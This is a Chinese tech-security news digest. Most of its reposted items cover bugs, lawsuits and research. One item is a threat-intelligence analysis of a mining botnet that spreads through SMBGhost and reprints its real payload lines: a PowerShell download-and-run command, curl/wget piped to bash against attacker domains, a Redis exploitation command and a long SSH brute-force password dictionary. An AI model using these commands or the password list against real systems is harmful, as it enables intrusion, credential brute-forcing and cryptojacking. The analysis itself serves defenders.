内容转载

= ̄ω ̄= 内容转载

谷歌 Pixel 4 Android 11 降级 Android 10 出 bug:面部识别不能用

6月15日消息,上周Android 11 Beta 1正式上线,谷歌Pixel机型率先尝鲜。考虑到这是Beta版Android 11,系统方面不够稳定,不少Pixel用户升级到Android 11之后选择降级回到Android 10,然而在降级之后发现了新的Bug。 据9to5Google报道,不少用户反馈谷歌Pixel 4、Pixel 4 XL降级回到Android 10之后面部识别不能用,系统提示面部信息无法录入。 谷歌方面承认了这一错误,表示会在后续版本中修复这一bug。9to5Google提醒用户,升级到Android 11的Pixel 4系列用户谨慎降级,否则面部识别无法使用。由于Pixel 4、Pixel 4 XL仅支持3D人脸识别,没有指纹,所以降级后如果出错只能用传统的密码或者图案解锁,安全性方面会降低。 值得一提的是,除了Pixel 4系列之外,一加8系列、Realme X50 Pro系列、小米10系列、小米POCO F2 Pro、Find X2系列等都将在本月尝鲜Android 11,值得期待。     (稿源:快科技,封面源自网络。)

Facebook 竞赛结果显示:准确检测深度造假视频的能力尚无人具备

Facebook公布了第一届Deepfake Detection Challenge(深度伪造检测挑战赛)的结果,这是一场算法的公开竞赛,目的是能够发现人工智能操纵的视频。结果虽然很有希望,但显示在自动化系统能够可靠地发现深层造假内容之前,还有很多工作要做,研究人员将这个问题描述为 “未解决的问题”。 Facebook表示,在比赛中获胜的算法能够发现挑战现实世界的深度伪造视频,平均准确率为65.18%,尽管还不错,但这不是你想要的任何自动化系统的准确率。 事实证明,深度伪造视频对于社交媒体来说是一种夸张的威胁。虽然这项技术引发了人们对视频证据的怀疑,但到目前为止,深度伪造视频的政治影响微乎其微。相反,更直接的伤害是非自愿的色情内容产生,这一类内容对社交媒体平台来说更容易识别和删除。 Facebook的首席技术官Mike Schroepfer在新闻发布会上告诉记者,他对挑战赛的结果很满意,他表示,这将为研究人员建立一个基准,并指导他们未来的工作。约有2 114名参赛者向比赛提交了35000多个检测算法,测试他们从约10万个短片的数据集中识别深层假视频的能力。Facebook雇佣了3000多名演员来制作这些片段,他们在自然环境中进行对话的记录,有些片段是用人工智能改变的,让其他演员的脸贴到他们的视频上。 研究人员被允许访问这些数据来训练他们的算法,当对这些材料进行测试时,他们产生的准确率高达82.56%。然而,当同样的算法对由未见过的镜头组成的 “黑盒 “数据集进行测试时,它们的表现要差得多,得分最好的模型准确率为65.18%。这表明在野外检测深度造假视频是一个非常具有挑战性的问题。 Facebook目前正在开发自己的深度造假视频检测技术。该公司在今年早些时候宣布禁止Facebook用户发布深度造假视频,但批评者指出,虚假信息更大威胁来自所谓的 “浅层假货”,使用传统手段编辑的视频。本次挑战赛的获胜算法将作为开源代码发布,以帮助其他研究人员,但Facebook表示,将对自己的检测技术保密,以防止其被反向工程。     (稿源:cnBeta,封面源自网络。)

因遭网络攻击关闭后 本田工厂已恢复生产

据外媒报道,本周初发生在本田的网络攻击迫使这家日本汽车制造商关闭了其位于美国俄亥俄州和土耳其的一些汽车厂以及印度和南美的一些摩托车工厂。此次攻击发生在北美工厂重新开放不到一个月后,这些工厂此前因新冠疫情而已将工作地点改为在家办公。 现在,本田公司发言人宣布,受到攻击的工厂已经恢复生产。巴西和印度的工厂已于周三恢复生产。但发言人指出,公司的一些北美在线金融服务和呼叫中心将继续停止服务。但在俄亥俄州的主要工厂的汽车产量工作已于周四恢复正常。 据悉,周一的网络攻击是本田全球网络遭遇到的第二次攻击,第一次则是在三年前席卷全球的WannaCry网络攻击。 值得庆幸的是,在这次攻击中,客户的个人信息没有被泄露,本田发言人对此作出了 澄清,然而遗憾的是他并未对因产量下降而造成的损失发表任何评论。     (稿源:cnBeta,封面源自网络。)

“黑球”行动再升级,SMBGhost 漏洞攻击进入实战

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/ZoiKCTEaxhXIXsI4OzhWvA   一、概述 2020年6月10日,腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种。此次变种在上个版本“黑球”行动中检测SMBGhost漏洞的基础上首次启用SMBGhost漏洞攻击,之前的若干种病毒只是利用SMBGhost漏洞做扫描检测,并无实质性攻击利用。本次更新还启用了SSH爆破以及新增Redis爆破能力攻击Linux系统。 由于SMBGhost漏洞CVE-2020-0796利用Windows SMB漏洞远程攻击获取系统最高权限,可直接攻击SMB服务造成RCE(远程代码执行),存在漏洞的计算机只要联网就可能被黑客探测攻击,并获得系统最高权限。该攻击行动使得“永恒之蓝”系列木马针对Windows系统的攻击能力再次增强。 腾讯安全威胁情报中心曾多次发布SMBGhost漏洞风险提示,至今仍有近三分之一的系统未修补该漏洞,我们再次强烈建议所有用户尽快修补SMBGhost漏洞(CVE-2020-0796)。 此外永恒之蓝下载器木马还新增了针对Linux系统的远程攻击,在失陷系统创建定时任务并植入挖矿木马功能,使得其攻击的范围继续扩大,包括云上Linux主机等都可能成为攻击目标。永恒之蓝本次更新的主要目的是释放挖矿木马,并会按照惯例在开始挖矿前,清除其他挖矿木马,以便独占系统资源。挖矿活动会大量消耗企业服务器资源,使正常业务受严重影响。 二、样本分析 攻击模块if.bin在smbghost_exec函数中利用从hxxp://d.ackng.com/smgh.bin下载的SMBGhost漏洞攻击程序发起攻击,攻击成功后远程执行以下shellcode: powershell IEx(New-Object Net.WebClient).DownLoadString(''http[:]///t.amynx.com/smgho.jsp?0.8*%computername%'') 针对Linux系统服务器的攻击 1、利用SSH爆破 扫描22端口进行探测,针对Linux系统root用户,尝试利用弱密码进行爆破连接,爆破使用密码字典: “saadmin”,”123456″,”test1″,”zinch”,”g_czechout”,”asdf”,”Aa123456.”,”dubsmash”,”password”,”PASSWORD”,”123.com”,”admin@123″,”Aa123456″,”qwer12345″,”Huawei@123″,”123@abc”,”golden”,”123!@#qwe”,”1qaz@WSX”,”Ab123″,”1qaz!QAZ”,”Admin123″,”Administrator”,”Abc123″,”Admin@123″,”999999″,”Passw0rd”,”123qwe!@#”,”football”,”welcome”,”1″,”12″,”21″,”123″,”321″,”1234″,”12345″,”123123″,”123321″,”111111″,”654321″,”666666″,”121212″,”000000″,”222222″,”888888″,”1111″,”555555″,”1234567″,”12345678″,”123456789″,”987654321″,”admin”,”abc123″,”abcd1234″,”abcd@1234″,”abc@123″,”p@ssword”,”P@ssword”,”p@ssw0rd”,”P@ssw0rd”,”P@SSWORD”,”P@SSW0RD”,”P@w0rd”,”P@word”,”iloveyou”,”monkey”,”login”,”passw0rd”,”master”,”hello”,”qazwsx”,”password1″,”Password1″,”qwerty”,”baseball”,”qwertyuiop”,”superman”,”1qaz2wsx”,”fuckyou”,”123qwe”,”zxcvbn”,”pass”,”aaaaaa”,”love”,”administrator”,”qwe1234A”,”qwe1234a”,” “,”123123123″,”1234567890″,”88888888″,”111111111″,”112233″,”a123456″,”123456a”,”5201314″,”1q2w3e4r”,”qwe123″,”a123456789″,”123456789a”,”dragon”,”sunshine”,”princess”,”!@#$%^&*”,”charlie”,”aa123456″,”homelesspa”,”1q2w3e4r5t”,”sa”,”sasa”,”sa123″,”sql2005″,”sa2008″,”abc”,”abcdefg”,”sapassword”,”Aa12345678″,”ABCabc123″,”sqlpassword”,”sql2008″,”11223344″,”admin888″,”qwe1234″,”A123456″,”OPERADOR”,”Password123″,”test123″,”NULL”,”user”,”test”,”Password01″,”stagiaire”,”demo”,”scan”,”P@ssw0rd123″,”xerox”,”compta” 爆破登陆成功后执行远程命令: `Src=ssho;(curl -fsSL http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`||wget -q -O- http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`) | bash` 2、利用Redis未授权访问漏洞 扫描6379端口进行探测,在函数redisexec中尝试连接未设置密码的redis服务器,访问成功后执行远程命令: `export src=rdso;curl -fsSL t.amynx.com/ln/core.png?rdso|bash` SSH爆破和Redis爆破登陆成功均会执行Linux Shell脚本core.png,该脚本主要有以下功能: a.创建crontab定时任务下载和执行脚本http[:]//t.amynx.com/ln/a.asp b.创建crontab定时启动Linux平台挖矿木马/.Xll/xr 通过定时任务执行的a.asp首先会清除竞品挖矿木马: 然后通过获取/root/.sshown_hosts中记录的本机SSH登陆过的IP,重新与该机器建立连接进行内网扩散攻击: 创建目录/.Xll并下载挖矿木马(d[.]ackng.com/ln/xr.zip)到该目录下,解压得到xr并连接矿池lplp.ackng.com:444启动挖矿。 永恒之蓝下载器木马自2018年底诞生以来一直处于高度活跃状态,目前该木马会通过以下方法进行扩散传播: 截止2020年6月12日,永恒之蓝木马下载器家族主要版本更新列表如下: IOCs Domain t.amynx.com t.zer9g.com t.zz3r0.com d.ackng.com URL http[:]//t.amynx.com/smgh.jsp http[:]//t.amynx.com/a.jsp http[:]//t.amynx.com/ln/a.asp http[:]//t.amynx.com/ln/core.png http[:]//d.ackng.com/if.bin http[:]//d.ackng.com/smgh.bin http[:]//d.ackng.com/ln/xr.zip

英特尔处理器又曝两个 SGX 新漏洞 攻击者可轻松提取敏感数据

正在英特尔努力消除多个处理器漏洞造成的负面影响的时候,三所大学的安全研究人员再次无情地曝光了 SGX 软件防护扩展指令的另外两个缺陷。对于攻击者来说,这可以让他们相当轻松地提取敏感数据。庆幸的是,新问题可通过积极的补救措施得到修复,且当前尚无新漏洞已在野外被利用的相关证据。 来自美国密歇根、荷兰阿姆斯特丹、以及澳大利亚阿德莱德三所大学的研究人员披露 —— 攻击者可利用多核体系架构的工作方式,来获得对受感染系统上敏感数据的访问权限。 其已经为两个漏洞开发了对应的攻击方法,并给出了 SGAxe 和 CrossTalk 的概念证明。 前者似乎是今年早些时候曝光的 CacheOut 攻击的高级版本,黑客可从 CPU 的 L1 缓存中提取内容。 研究人员解释称,SGAxe 是英特尔减轻针对软件防护扩展(SGX)的旁路攻击的一个失败尝试。作为 CPU 上的一个专属区域,SGX 原意是确保正在处理的代码和数据的完整与机密性。 借助瞬态执行攻击,黑客可从实质上恢复存储在 SGX 区域中的加密密钥,并将之用于解密长存储区,以获得机器的 EPID 密钥。后者被用于确保事务的安全性,比如金融交易和受 DRM 保护的内容。 至于第二个 CrossTalk 漏洞,其属于微体系架构数据采样(MDS)的一个衍生,能够针对 CPU 的行填充缓冲区(LBF)处理的数据发起攻击。 其原本希望提供 CPU 内核访问的“登台缓冲区”,但黑客却能够利用在一个单独核心上运行的特制软件,来破坏保护其运行的软件代码和数据私钥。 据悉,新漏洞影响 2015 ~ 2019 年发布的多款英特尔处理器,包括部分至强 E3 SKU(E5 和 E7 系列已被证明可抵御此类新型攻击)。 英特尔在 6 月份的安全公告中称,只有极少数的人能够在实验室环境中发起这些攻击,目前尚无漏洞在野外被利用的报告。 即便如此,该公司仍将尽快发布微码更新,同时让之前签发的证明密钥失效。     (稿源:cnBeta,封面源自网络。)

Python 和 Go 成为年度最受欢迎的黑客工具榜首

网络安全公司 Imperva Cloud WAF 近期分享了其在 2019 年一年内针对网络安全事件的观察。对数据进行聚类分析后,他们得到了如下结论: 按工具来分类,Python 依旧是大多数黑客的首选武器,紧接着是使用量增长迅速的 Go 语言;再其次是 WinHttp 库,该库主要由 Windows 上运行的 .net 和 CPP 使用;Shell 工具(如 cURL、wget 等)也榜上有名。浏览器也是常用的攻击工具。 根据 GitHut 2.0 给出的统计信息,Python 和 Go 都在 2019 年的前五大语言中占有一席之地。于是,Imperva 公司又将目光聚焦到了 GitHub 上的网络安全项目。GitHub 虽然未对存储库进行直接分类,但 Security 主题下拥有超过 8,500 个与安全相关的库,而这些库中的主要语言分别为:长期排在第一位的 Python,其次是 Java、JavaScript 和 PHP,最后是 Go。前四位毫不令人意外,而 Go 是在 2019 年首次取代了基于 Shell 的代码,进入 top 榜。 Imperva 公司创建了一个图表,用以显示 2019 年受每种工具攻击的网站所占的百分比。数据显示,大多数网站每个月都会受到 Python 的攻击,而 30-50% 的网站会受到其他上述工具的攻击。 接下来,该公司又对两种最常见的攻击——XSS 和 SQLi——以及通过 Go 和 Python 使用这些攻击的尝试进行了观察。值得注意的是,到 2019 年底,Go 在两种类型的攻击中都赶上了 Python。不过,判断这种趋势是否会持续还为时过早,但 Go 变得越来越流行是毋庸置疑的。 另外,每种主要攻击类型的工具分布如下图: 如图所示,Python 是 RCE/RFI、文件上传和数据泄漏中占比最大的工具,而 Go 在常规自动攻击中更强大。 根据 IP 查看工具使用的来源国家/地区如下图: 中国使用 Python 的比其他任何国家都多,而 Go 是印度的首选工具。 意料之外的是,使用工具进行攻击的 IP 数量与该工具引起的安全事件数量之间没有强烈的关联。这部分可以通过工具所涉及的攻击类型来解释。 通过查看事件与 IP 之间的比率,也可以进一步验证该假设。例如,可以轻松用于浏览器模拟的低请求率工具,其 IP 比率非常低。相比之下,Go 和 Python 等可产生大规模攻击的工具的 IP 比率则高得多。 该公司在近期关于网络安全的研究中,还带来了以下发现: DDoS 攻击的数量和规模不断增加 来自云服务的攻击增长 机器人流量也在上涨 另外,随着疫情的缓解,网络攻击带来的流量又开始恢复和增长 详情可查看报告原文:https://www.imperva.com/blog/python-and-go-top-the-chart-of-2019s-most-popular-hacking-tools/     (稿源:开源中国,封面源自网络。)

研究人员称美国 5 个州使用的网络投票技术存在致命缺陷

OmniBallot是美国几十个司法管辖区都在使用的选举软件。除了递送选票和帮助选民标记选票外,它还包括一个在线投票的选项。至少有三个州,西弗吉尼亚州、特拉华州和新泽西州已经或计划在即将举行的选举中使用该技术。俄勒冈州和华盛顿州的四个地方司法管辖区也使用在线投票功能。但麻省理工学院的迈克尔-斯佩克特和密歇根大学的亚历克斯-哈尔德曼这对计算机科学家的新研究发现,该软件安全保护措施不足,对选举的完整性造成了严重的风险。 OmniBallot背后的公司Democracy Live在给Ars Technica的邮件回复中为其软件辩护。Democracy Live首席执行官Bryan Finney写道:”报告没有发现OmniBallot的任何技术漏洞”。从某种意义上来说,这是真的,研究人员并没有在OmniBallot代码中发现任何重大漏洞。但这也忽略了他们分析的重点。软件的安全性不仅取决于软件本身,还取决于系统运行环境的安全性。例如,如果投票软件运行在被恶意软件感染的电脑上,就不可能保证投票软件的安全。而在美国,有数百万台电脑被恶意软件感染。 这个问题现在特别紧迫,因为正在进行的COVID-19大流行迫使选举官员对选举程序作出重大改变。目前,大多数使用OmniBallot软件的司法管辖区都没有使用其 “电子选票传递 “功能。但启用该功能只需更改配置即可。选举官员有可能在远程投票更容易的压力下,决定在今年11月大选中启用该软件的在线投票功能。 Specter和Halderman取得了OmniBallot软件的副本,对其进行了逆向工程,然后创建了模仿真实服务器行为的新服务器软件。这使他们能够在不冒干扰真实选举的情况下对软件进行实验。他们发现,OmniBallot提供了一些不同的功能,州选举官员可以选择向选民提供。最基本的是空白选票交付功能,可向选民提供可打印出来并寄回投票站的PDF选票。各地也可提供选票标记功能,在选票打印出来之前,代选民标记。这可以让失明选民独立填写选票。它还可以防止多投,并警告选民没有投票。 但是Specter和Halderman认为这种能力会带来一些额外的风险。恶意软件可以被编程成在很短的时间内切换投票。理论上,选民应该在投递选票前检查选票是否正确,但研究表明,选民对此并不严格。霍尔德曼和其他人的一项研究发现,在一次现实的模拟选举中,只有6.6%的选民向选举监督人报告了投票的变化。     (稿源:cnBeta,封面源自网络。)

为协助 FBI 追捕罪犯 Facebook 对嫌疑人展开黑客攻击

据Motherboard周三的一份报告称,为了揭露一名在Facebook上反复骚扰和剥削女孩的加州男子,该社交网络决定帮助FBI对其进行黑客攻击。据报道,Facebook多年来一直在跟踪Buster Hernandez。据Motherboard报道称,通过安全操作系统Tails,Hernandez得以隐藏他的真实IP地址并继续在Facebook上联系和骚扰数十名受害者。 为此,Facebook的安全团队最终决定跟第三方公司合作开发一套黑客工具以此来利用Tails视频播放器的漏洞。据报道,Facebook为此支付了六位数的费用,该漏洞可以显示观看视频的人的真实IP地址。据了解,该工具被交给了一位中间人,后者则将其移交给了FBI。该报道还称,目前还不清楚FBI是否知道Facebook参与其中。 据Motherboard称,FBI跟一名受害者合作利用该工具向Hernandez发送了一段设置陷阱的视频从而收集了能对其进行逮捕并定罪的证据。今年2月,Hernandez承认了41项指控,其中包括制作儿童色情作品、威胁杀人、绑架和伤害。 Facebook证实了他们有跟安全专家合作来为FBI提供帮助。 Motherboard指出,其通过跟几名Facebook现任和前任员工经过交谈了解到,这是该公司首次也是唯一一次以这种特定方式帮助执法部门追缉罪犯。     (稿源:cnBeta,封面源自网络。)

谷歌遭亚利桑那州司法部长起诉 被指欺诈用户

据外媒报道,当地时间周三,谷歌受到来自亚利桑那州司法部长Mark Brnovich提起的诉讼,后者指控这家搜索巨头欺骗用户并从他们的手机中收集位置数据。我们知道,谷歌的绝大部分收入来自其庞大的广告业务,而谷歌在用户使用其产品时收集的个人信息为其提供了支撑。 对此,Brnovich在Twitter上发文指出,用户被一种虚假的安全感欺骗了,因为谷歌让用户认为他们禁用了位置数据收集的设置,而实际上这些设置仍旧是处于开启状态。 该诉讼要求谷歌提供损害赔偿,但具体金额尚不清楚。Brnovich的办公室也没有回复记者的置评请求。 谷歌则有在一份声明中为自己关于位置数据的政策进行过辩护。发言人Jose Castaneda表示:”司法部长和收取诉讼费用的律师似乎错误地描述了我们的服务。我们一直在我们的产品中内置了隐私功能并为位置数据提供了强大的控制。我们期待澄清事实。”     (稿源:cnBeta,封面源自网络。)  

Windows 10 20H1 谜之 BUG:1 月已修复的磁盘优化问题在正式版中又出现

在昨日的补丁星期二活动日中,微软宣布扩大 Windows 10 May 2020(20H1/Version 2004)的部署范围,邀请更多用户通过手动检查 Windows Update 更新的方式获得升级。尽管升级过程非常流畅,但是部分用户反馈在升级后导致优化存储的内置工具无法正常工作。 根据用户的反馈和外媒的复现测试,升级 Windows 10 Version 2004 功能更新会导致“磁盘优化”和“碎片整理和磁盘优化”工具出现问题。 磁盘优化是 Windows 10 系统内置的工具,允许用户对碎片文件进行碎片整理并解决性能问题。默认情况下,Windows 10每周都会自动对所有分区进行维护,你可以在 “优化驱动器 “工具中查看状态。 在升级 Windows 10 Version 2004 功能更新之后,磁盘优化工具虽然可以帮助用户解决性能问题,但不能报告正确的状态。 例如,磁盘优化工具会报告说并未在你的 PC 上运行扫描,在已经执行优化操作之后依然显示需要优化。这对于想要检查驱动器健康状况的管理员来说是个大问题,因为你无法发现你的驱动器是否经过优化。 但需要注意的是,这款工具的功能并没有损坏。,它仍然可以帮助用户自动或手动修复Windows性能问题。你可以通过以下步骤来验证优化/碎片和TRIM的状态。 1.打开 “开始 “菜单。 2.输入 “事件查看器 “并打开它。 3.在 “事件查看器 “中,导航到Windows日志>应用程序。 4.右键单击应用程序并单击 “过滤当前日志”。 5.在事件源下拉菜单中选择Defrag。 6.单击 “确定”。 中间的窗格会显示一个事件列表,点击它们会在预览窗格中显示详细信息。值得注意的是,作为Windows Insider计划的一部分,该bug已经被报告给微软,有用户要求公司不要运送带有该bug的更新。 事实上,这个 BUG 曾经在今年一月发布的 Windows 10 Build 19551 更新中已经得到了修复,但是尚不清楚为何会进入到稳定版本中。微软在2020年1月23日的一篇博文中指出:“感谢您报告了磁盘优化控制面板错误地显示优化没有进行的错误提醒。我们已经在这个Build版本中修复了它。”     (稿源:cnBeta,封面源自网络。)